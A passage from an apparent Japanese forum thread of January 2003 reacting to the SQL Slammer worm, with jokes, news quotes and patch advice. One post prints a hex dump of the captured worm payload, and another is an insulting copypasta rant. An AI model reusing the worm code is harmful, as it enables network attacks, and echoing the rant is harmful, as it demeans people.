問題なのは、いかにケリをつけるか・・・それだけだ。

戦争はいつだって非現実的なもんさ。
戦争が現実的であったことなど、ただの一度もありゃしないよ。

>>823
問題のセキュリティーホールを埋めるパッチは配布済み。
しかもＳＰ３入りもしている。




はず。



って、2003/1/22づけってどういうこと？
http://internet.watch.impress.co.jp/www/article/2003/0122/sql.htm

韓国はＩＴ大国って言っても、複雑で高度な技術があるというより、
広くＩＴ利用の基本的思想が知れ渡っているということだろう。
ＩＴ革命で最も重要な部分がクリアされてる点で、今回みたいなこと
があっても大して問題ではない。
ＰＣは普及してもＩＴが全然理解されていない、日本のほうが問題は
深刻だ。

>>932 何つかってる？

>>902
ノートン更新せい。
たった今の更新とうしたら、今までうるさかったそのコピペに無反応だ。

>>910
誰かがコードを書いてるのかね？
いつものやつ。
原因は何だろ？

この程度のことは、大したことではないんですよ。

>>900　自分とこのＬＡＮ内だってば
>>902　誤報　専用ブラウザだと読めなくなるので通常のブラウザで。

>>920
ﾜﾗｴｰﾙ
B級SF並みニュース。

大体これでMSマンセーの国がわかるな

>>932
窓からＰＣを投げ捨てる

「ＩＴ大国、韓国でネット全面マヒ」
朝日、必死だな。　ネチズン大国だろ？

俺なんてセキュリティソフトなんて何もいれてないし
ウイルス検知ソフトも何も入れてない。丸腰ファイトだぜ
そうそうやられるかっつーの。やれるもんならやｔｔ

>>902
>>910
>>914

>>869参照汁・・・

北海道は壊滅状態だってさ
http://www.nippon-news.co.jp/kiji/305698/

>>935
ﾜﾛﾀｗ

俺のポートが最強

↓　さっき捕獲したワームのHEXDUMPです アセンブラ屋さんよろすく。


0000000 0104 0101 0101 0101 0101 0101 0101 0101
0000010 0101 0101 0101 0101 0101 0101 0101 0101
*
0000060 dc01 b0c9 eb42 010e 0101 0101 0101 ae70
0000070 0142 ae70 9042 9090 9090 9090 6890 c9dc
0000080 42b0 01b8 0101 3101 b1c9 5018 fde2 0135
0000090 0101 5005 e589 6851 642e 6c6c 6568 336c
00000a0 6832 656b 6e72 6851 756f 746e 6968 6b63
00000b0 6843 6547 5474 b966 6c6c 6851 3233 642e
00000c0 7768 3273 665f 65b9 5174 7368 636f 666b
00000d0 74b9 516f 7368 6e65 be64 1018 42ae 458d
00000e0 50d4 16ff 8d50 e045 8d50 f045 ff50 5016
00000f0 10be ae10 8b42 8b1e 3d03 8b55 51ec 0574
0000100 1cbe ae10 ff42 ff16 31d0 51c9 5051 f181
0000110 0103 9b04 f181 0101 0101 8d51 cc45 8b50
0000120 c045 ff50 6a16 6a11 6a02 ff02 50d0 458d
0000130 50c4 458b 50c0 16ff c689 db09 f381 613c
0000140 ffd9 458b 8db4 400c 148d c188 04e2 c201
0000150 e2c1 2908 8dc2 9004 d801 4589 6ab4 8d10
0000160 b045 3150 51c9 8166 78f1 5101 458d 5003
0000170 458b 50ac d6ff caeb 040a

一般PCではなんら問題はない。
ただ、外がやかましくて重いだけ。

うちにはマジでアタックぜんぜんこないよ。
KerioPF使ってるんだけど、まったくアラームあがんない。

>>920
プロジェクト2501

LoveLetterのコピペは
ログフォルダを検査除外してやりゃ静かになる

日テレでやる

>>932
ルーターなら、パケットフィルタで設定して弾く。

日テレもうすぐニュース始まるぞ

975

>>920 パトライト付けてパトロールに逝ってきます

ニュースやるぞ〜。

寝るといったがもう一言。
いつぞやの閉鎖騒動みたいに
2chの力で駆除ツール開発しちまったらすごいね。

すごいね。

>>955
すでに解析されてます。

日テレｷﾀ!!

またノートンか

日本テレビ　ニュースやる。

とりあえずチャンネルかえました

＞全国８か所に配備されたサイバーテロ専門部隊に待機するよう指示しました。
＞全国の警察本部などのサイバー攻撃の感知装置には異常は見つかっていないということです。

ﾜﾛﾀ

トレンドマイクロの韓国が接続できないようですが

NTV予告キター

1000

なんか127.0.0.1って所からめちゃくちゃ�dで来るんですけど

あのなあ、前から言おうと思ってたんだけどよ、
よくいるだろ、アートかぶれのバカ女ってのがよ！
何だか知らねェけどよ、美大出だかデザイン専門学校出だかの
気取ったブスがよ！　服装もパリだか何だかを意識したような
ヘンな格好しやがってよ、タコが！
好きな映画は「ベティ・ブルー」「SEXと嘘とビデオテープ」
だと！？　ざけんなよ、ムードで物を言うなってんだ！
ちゃんと理解して気に入って言ってんのならいいが、
どうせカッコつけて言ってんだろ？　このオカメ面がよ！
大体テメェ、東洋人丸出しの外見で、ナ〜ニがヨーロッパだよ！？
エエッ！？　ヨーロッパってツラかよ、オイ！
どのツラ下げてヨーロッパだってんだ？　ブスがよ！
テメェ、家で1人にときは「笑っていいとも！」見ながら屁こいて
るくせによ！　知ってるんだぞ、コラ！
何だよ、その妙なニット帽は！　雪降ってねェぞ！！
何ィ！？吉野家や松屋ではメシ喰った事ないだと！？
女性雑誌に載ってるようなシャレたナウい店で喰うだとォ！？
ざけんな！　お前のジャパニーズ胃袋はな！そんなお上品な
代物は受け付けねェって言ってるぞ！
お前の胃袋に合うのは牛丼とカレーだっての！　喰え、タコ！
いいか！？　どうお前がライフスタイルをパリっぽく見せようと
無い知恵絞って取り繕ってもな、お前のDNAにはニッポンの
風土、特色がキッチリと刻まれてるんだよ！
お前がいくら白人のマネごとをしようと、お前のニッポンDNA
は永久に続くんだよ！　何代あとになってもな！
お前には凱旋門より雷門、セーヌ川より多摩川、
エッフェル塔より通天閣、シャンゼリゼ通りよりアメ横が
ピッタリ来るんだよ、よ〜く憶えよけ！　ブサイクが！
おい、それからな、鼻毛出てるぞ！　切っとけよ、パリジェンヌ！

>>938
あんたなんでここにいるんだ？

漏れも変えた

まもなくここは　乂1000取り合戦場乂　となります。

　 　 　 ＼∧＿ﾍ　　　　　／￣￣￣￣￣￣￣￣￣￣￣￣
　,,､,､,,,　/ ＼〇ノゝ∩ ＜　1000取り合戦、いくぞｺﾞﾙｧ！！　　　　　　　,,､,､,,,
　　　　/三√ ﾟДﾟ)　/　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿　　,,､,､,,,
　　 　　/三/| ﾟＵﾟ|＼　　　　　　,,､,､,,,　　　　　　　　　　　　　　　　　　　　　　　,,､,､,,,
　,,､,､,,,　Ｕ （:::::::::::）　　,,､,､,,,　　　　　　　　　＼オーーーーーーーッ！！／
　　 　 　//三/|三|＼　　　　　∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　∪　 ∪　　　　　　 （　　　　）　　　 （　　　　 ）　　　（　　　　）　　　 ）
　,,､,､,,,　　　　　　　,,､,､,,,　　∧＿∧∧＿∧∧＿∧ ∧＿∧∧＿∧∧＿∧∧＿∧
　　　　　　,,､,､,,,　　　　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）　　　 （　　　　）

1000?

北海道が落ちたってほんと？

1000

１０００げと

とりあえず、msのsqlserver開発リーダは首くくれ。

バンテリン

1000

>>869
ｸﾞｯｼﾞｮﾌﾞ
ときどきノートン先生がちゃんと働いてるか、気になるんだよな
ちょうどいいテストになる
ノートンの更新も出てた、これで安心

1000

>>950
漏れのＰＣも丸腰だが何も影響は出ないな。
北海道から徐々に南下してるのか？

世界各地で２５日発生したネットトラブルは、新種の「ワーム」と呼ばれる
自己複製するソフトが各ネットワークのコンピューターを攻撃し、回線が
混乱したためとみられる。同様のワームによる被害は一昨年９月１１日の
米国同時多発テロ直後にも発生し、何者かが世界的なインターネットの
混乱を狙ったとみられる。

インターネットのセキュリティー監視会社「ラック」によると、日本国内の一部
の企業で大量のデータが外部からコンピューターに送り付けられ、ネットワ
ークアクセスができなくなった。ネットワーク関係者によると、午後２時すぎ
から、中国向けのサーバーへのアクセスが不能になった。

コンピューターウィルス対策ソフトメーカー「シマンテック」によると、新種の
「ワーム」はマイクロソフト社製のデータベース管理ソフトの欠陥（セキュリー
ティーホール）から侵入し、自己複製を無限に繰り返して、ネットワークを
通じて移動し、接続されているサーバー、端末を次々に攻撃し、機能不能に
追い込んでいくという。マ社が欠陥対策に配布した修正プログラムを施して
いる場合には侵入されない。現在のところ、新種ワームによってデータや
システムが破壊されたとの報告はないという。

総務省インターネット戦略室は「緊急対応が必要という状況判断はしていない」
と話している。

引用元
http://www.mainichi.co.jp/news/flash/shakai/20030126k0000m040084000c.html

137

1000

>>976
あほか？

100000000000000

1000

人形使いか！

10000

サイバーエロ

１０００じゃ

このスレッドは１０００を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。